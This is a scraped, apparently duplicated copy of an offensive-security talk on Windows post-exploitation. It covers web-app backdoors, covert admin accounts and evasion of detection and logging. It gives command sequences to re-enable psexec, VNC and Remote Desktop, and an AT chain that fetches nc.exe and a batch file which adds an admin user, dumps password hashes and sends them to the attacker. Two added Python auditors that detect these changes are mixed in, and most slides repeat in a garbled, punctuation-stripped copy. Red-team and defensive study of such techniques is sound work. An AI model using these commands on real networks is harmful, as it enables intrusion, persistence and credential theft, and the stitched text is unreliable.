bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTO
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
    net use \\target\ipc$ /user:name password
    sc \\target config netdde start= auto
    sc \\target config netddedsdm start= auto
    sc \\target config clipsrv start= auto
    sc \\target start netdde
    sc \\target start netddedsdm
    sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the vnc files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =
  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
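From the defender's side, the changes on slides 50, 53 and 54 all leave traces in state an admin can export (a `reg export` dump and a `secedit /export` INF). The Python below is an added example, not code from the talk: it parses both formats and flags watched services flipped to auto-start, fDenyTSConnections cleared, TSEnabled set, logon rights granted to accounts outside an expected set, and deny-rights left empty. The sample dump and INF are constructed to mirror the slides' files; the watched-service list and the expected-account set are this example's assumptions.

```python
"""Audit a registry export and a secedit INF for the feature modifications on
slides 50, 53 and 54. Added example, not code from the talk; inputs are constructed."""
import re

# HKLM\SYSTEM\CurrentControlSet\Services\<svc>\Start: 2 = auto, 3 = manual, 4 = disabled
START_AUTO = 2
# Services the talk switches back on (assumption: a hardened host keeps these off).
WATCHED_SERVICES = {"netdde", "netddedsdm", "clipsrv", "termservice"}
# Rights fix_ts_policy.ini grants, and the deny-rights it blanks out.
GRANT_RIGHTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
DENY_RIGHTS = ("sedenyinteractivelogonright", "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")


def parse_reg(text):
    """Parse .reg / 'reg export' text into {key_path: {value_name: raw_value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip().strip('"')] = value.strip()
    return keys


def dword(raw):
    """Decode a 'dword:0000000a' value; None for any other encoding."""
    m = re.fullmatch(r"dword:([0-9a-fA-F]{8})", raw)
    return int(m.group(1), 16) if m else None


def audit_registry(reg_text):
    """Flag watched services set to auto-start and Terminal Server switched on."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        parts = key.lower().split("\\")
        if len(parts) == 5 and parts[1:4] == ["system", "currentcontrolset", "services"]:
            if parts[4] in WATCHED_SERVICES and dword(values.get("Start", "")) == START_AUTO:
                findings.append(f"service {parts[4]} set to auto-start")
        elif parts[-2:] == ["control", "terminal server"]:
            if dword(values.get("fDenyTSConnections", "")) == 0:
                findings.append("fDenyTSConnections=0: Remote Desktop connections allowed")
            if dword(values.get("TSEnabled", "")) == 1:
                findings.append("TSEnabled=1: Terminal Server enabled")
    return findings


def parse_inf_rights(text):
    """Return {right_lower: [accounts]} from the INF's [Privilege Rights] section."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
        elif in_section and "=" in line:
            name, _, value = line.partition("=")
            rights[name.strip().lower()] = [a.strip() for a in value.split(",") if a.strip()]
    return rights


def audit_policy(inf_text, expected_accounts):
    """Flag logon rights granted outside expected_accounts and deny-rights left empty.
    secedit exports SIDs with a leading '*'; hand-typed names (as on the slide) have none."""
    findings, rights = [], parse_inf_rights(inf_text)
    for right in GRANT_RIGHTS:
        for acct in rights.get(right, []):
            if acct.lstrip("*") not in expected_accounts:
                findings.append(f"{right} granted to unexpected account {acct}")
    for right in DENY_RIGHTS:
        if right in rights and not rights[right]:
            findings.append(f"{right} present but empty: deny list cleared")
    return findings


# Constructed samples shaped like the slides' enable_ts.reg and fix_ts_policy.ini.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetDDE]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"""
SAMPLE_INF = """[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account,*S-1-5-32-555
SeInteractiveLogonRight = hacked_account
SeDenyRemoteInteractiveLogonRight =
"""

if __name__ == "__main__":
    for f in audit_registry(SAMPLE_REG) + audit_policy(SAMPLE_INF, {"S-1-5-32-555"}):
        print("FINDING:", f)
```

NetDDE in the sample stays at Start=4 (disabled) and is therefore not reported; only ClipSrv, flipped to 2, is.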
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
  Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i <us> GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
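The chain on slides 58 to 61 has a recognisable shape from the reviewing admin's side: a job queued to run a minute or two after it was created, pulling a file with tftp, then adding a user, putting it in Administrators and running a hash dumper. The Python below is an added example, not code from the talk: it scores scheduled-job records against those indicators and escalates when two coincide. The job records are constructed, and their field layout is this example's own, not the output of any tool; the five-minute "just in time" window is an assumption.

```python
"""Review scheduled-job records for the AT-driven chain on slides 58-61.
Added example, not code from the talk; job records below are constructed and
their field layout is this example's own, not any tool's output."""
import re
from datetime import datetime, timedelta

# Each indicator is a regex over a job's command line (or the lines of the batch
# file it launches, if the reviewer has retrieved it) plus a label for the report.
INDICATORS = [
    (r"\btftp\s+-i\s+\S+\s+get\b", "tftp binary transfer"),
    (r"\bnet\s+user\b.*\s/add\b", "local user creation"),
    (r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", "admin group membership change"),
    (r"\bnet\s+user\b.*\s/active:yes\b", "account re-enabled"),
    (r"\bsc\b.*\bconfig\b.*\bstart=\s*auto\b", "service start type changed"),
    (r"\b(pwdump|cachedump)\b", "credential dumping tool"),
]
JUST_IN_TIME = timedelta(minutes=5)  # assumption: jobs queued this close to creation are unusual


def review_job(job):
    """Return (suspicious, reasons) for one job record.
    Escalate when two reasons coincide (one indicator plus a just-in-time schedule,
    or two indicators), so a routine nightly batch job on its own is not flagged."""
    reasons = [label for pattern, label in INDICATORS
               if any(re.search(pattern, line, re.I) for line in job["commands"])]
    lead = job["runs_at"] - job["created"]
    if timedelta(0) <= lead <= JUST_IN_TIME:
        reasons.append(f"runs {lead.seconds // 60} min after creation")
    return len(reasons) >= 2, reasons


def review_jobs(jobs):
    """Names of the jobs that should be escalated, in listing order."""
    return [job["name"] for job in jobs if review_job(job)[0]]


T0 = datetime(2007, 8, 1, 12, 0)
# Constructed records: At1/At2 mirror the slide-61 sequence, At3 is a routine job.
SAMPLE_JOBS = [
    {"name": "At1.job", "created": T0, "runs_at": T0 + timedelta(minutes=1),
     "commands": ["tftp -i 10.0.0.5 GET e.bat"]},
    {"name": "At2.job", "created": T0, "runs_at": T0 + timedelta(minutes=2),
     "commands": ["e.bat",                          # what the job launches...
                  "net user hacked hacked /add",    # ...and the lines inside e.bat
                  "net localgroup administrators hacked /add",
                  "pwdump.exe > hashes.txt"]},
    {"name": "At3.job", "created": T0, "runs_at": T0 + timedelta(days=1),
     "commands": [r"c:\backup\nightly.bat"]},
]

if __name__ == "__main__":
    for job in SAMPLE_JOBS:
        suspicious, reasons = review_job(job)
        print(job["name"], "ESCALATE" if suspicious else "ok", reasons)
```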
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS sessions / credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
